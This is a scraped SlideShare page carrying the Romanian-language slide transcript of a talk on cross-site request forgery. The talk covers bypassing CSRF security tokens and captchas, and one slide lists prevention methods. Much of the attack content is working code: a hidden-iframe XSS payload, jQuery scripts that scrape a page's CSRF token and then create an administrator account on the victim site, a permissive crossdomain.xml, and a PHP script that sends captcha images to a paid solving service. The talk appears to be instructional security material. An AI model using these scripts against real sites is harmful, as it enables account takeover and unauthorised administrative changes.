Your SlideShare is downloading. ×
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Cross Site Request Forgery Attacks

2,023

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
2,023
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
24
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Cross Site Request Forgery Attacks Security token bypass Captcha bypass Presented by Vlad Horatiu [email_address]
  • 2. Ce este CSRF
  • 3. Context
    • Dispunem de:
      • Acces la un web site pe care victima il poate frecventa
      • Cross Site Scripting (XSS) in domeniul in care victima avea privilegii superioare
  • 4. Principiul de baza
    • Victima acceseaza site-ul in care avem acces
    • Prin intermediul javascript, victima trimite requesturi catre locatia in care are acces, prin intermediul XSS.
  • 5. De ce avem nevoie de XSS?
    • Browserele moderne permit requesturi AJAX, intrucat si accesul la sursa HTML a unei pagini, doar atata timp cat atat request-ul, cat si target-ul sau sunt pe acelasi domeniu.
    • Aceasta protectie restrictioneaza doar accesul la sursa unei pagini de pe alt domeniu, nu are niciun impact asupra accesarii sale (ex: iframe)
    • De ce?
      • Securitate
      • Implicatii in web advertising
      • Securitate
  • 6. Initierea atacului
    • Iframe din site-ul cu acces catre cel cu xss
    <html> <iframe src=&quot;http://victimsite.com/index.php?xss=<script>document.write('<iframe src='http://attacker');</script>&quot; width=&quot;50&quot; height = &quot;50&quot; style=&quot;filter: alpha(opacity=0);-moz-opacity:0;opacity: .0;&quot;> </iframe> </html>
  • 7. Login check function check() { $.get(&quot;login.html&quot;, function(data){ if(data.indexOf('blanaa') != -1) { var logged = tryToLogin(); } else { var logged = true; } }); }; function tryToLogin() { $.get(&quot;login.html&quot;, function(data){ $('#form_frame').contents().find('form').submit(); return (data.indexOf('blanaa') != -1); }); }
  • 8. Token bypass
    • URL atac CSRF clasic:
      • http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned
    • Link valid in cazul unei protectii token:
      • http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned&token=693a93e07e1032751a2f14d00e33a56f
    • Code snippets (PHP):
      • Generare token:
        • mysql_query(“INSERT INTO `user_tokens` (`user_id`, `user_token`) VALUES (‘”. Intval($uid) .”’, ‘”. sha1(mt_rand(1000000, 9999999).microtime(true)) .”)’);
      • Validare token:
        • $query = mysql_query(“SELECT `user_token` FROM `user_tokens` WHERE `id` = ‘”. Intval($uid) .”’ LIMIT 1”);
        • $token = getQueryToken($query);
        • if($_COOKIE[‘token’] != $token)
          • Die(‘Esti un bulangiu!’);
  • 9. Token bypass
    • Javascript token crawler
    function addAdmin() { $.get(&quot;http://victimsite.com/admin/add_user.php&quot;, function(data){ var token = getBetween('&token=', '&', data); alert(token); $.get(&quot;http://victimsite.com/admin/add_user_success.php?user=1337hacker&pass=pwned&token&quot;+token, function(data){ }); }); }; function getBetween(lft, rgt, string) { var split = ''; split = string.split('&token='); split = split[1]; split = split.split('&'); split = split[0]; return split; }
  • 10. Token bypass
    • Javascript token crawler (POST)
    function addAdmin() { $.get(&quot;http://victimsite.com/admin/add_user.php&quot;, function(data){ var token = getBetween(&quot;type=&quot;hidden&quot; name=&quot;token&quot; value=&quot;&quot;, &quot;&quot;&quot;, data); $.post(&quot;http://victimsite.com/admin/add_user.php&quot;, { user: &quot;1337hacker&quot;, pass: &quot;pwned&quot;, token: token }, function(data) {}) }); }; function getBetween(lft, rgt, string) { var split = ''; split = string.split('&token='); split = split[1]; split = split.split('&'); split = split[0]; return split; }
  • 11. Token bypass
    • Metode de prevenire
      • Protectie impotriva atacurilor XSS
      • Cerere de captcha la operatiunile cu grad mare de risc
      • Cerere de parola la operatiunile cu grad mare de risc
      • Folosirea Private Browsing
      • Setarea sesiunilor cu o data de expirare relativ mica
      • Scrierea token-ului intr-un mod greu de parsat de catre script (exemplu: prin intermediul unui javascript obfuscat)
  • 12. Token bypass
    • Dezavantaje
      • Sensibil la schimbarile structurii HTML
  • 13. Flash Cross-domain policy
    • Ne permite sa facem requesturi ajax intre doua domenii diferite
    • Domeniul destinatie trebuie sa aiba domeniul sursa intr-un “whitelist”: crossdomain.xml
    • Exemplu de crossdomain.xml:
    <cross-domain-policy> <allow-access-from domain=&quot;*&quot;/> </cross-domain-policy>
  • 14. Captcha bypass
    • Context
      • Userul are campurile username si password completate, datorita autocomplete
      • Formularul de logare cere captcha verification
    • Principiul de baza
      • Preluarea image path-ului prin javascript
      • Trimiterea imaginii catre un script de captcha breaking (prin intermediul crossdomain.xml)
      • Trimiterea informatiilor de logare
  • 15. Captcha bypass
    • Captcha breaking script snippet:
    $rand = sha1(mt_rand(1000000, 9999999).microtime(true)); if(isset($_GET['path']))   file_put_contents($rand.'.jpg', file_get_contents($_GET['path'])); if ($captcha = $client->upload($rand.'.jpg')) {     echo &quot;CAPTCHA {$captcha['captcha']} uploadedn&quot;;     sleep(DeathByCaptcha_Client::DEFAULT_TIMEOUT);     if ($text = $client->get_text($captcha['captcha'])) {         echo $text;         } else {         $client->remove($captcha['captcha']);     echo '0';     } }
  • 16. Captcha bypass
    • Dezavantaje
      • Timpul ridicat de rezolvare a captcha-ului
        • Pentru ca metoda sa mearga, userul ar trebui sa ramana pe pagina cel putin un minut
      • Costul ridicat al rezolvarilor captcha
      • Schimbarile in structura HTML
      • Necesitatea existentei Flash Player in sistemul victimei
  • 17. Exemple concrete
    • Adaugare utilizatori intr-o platforma Wordpress
    • Adaugare user MySQL
  • 18. Intrebari

×